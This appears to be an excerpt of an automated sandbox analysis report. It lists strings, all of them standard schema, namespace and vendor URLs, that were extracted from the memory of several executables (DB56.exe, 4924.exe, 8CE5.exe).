Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://forms.rea
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
Source: 8CE5.exe.5.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 8CE5.exe.5.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 8CE5.exe.5.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: DB56.exe, 00000012.00000002.626049960.0000000002E90000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://service.r
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://support.a
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631215292.0000000002C4B000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631282609.0000000002C53000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
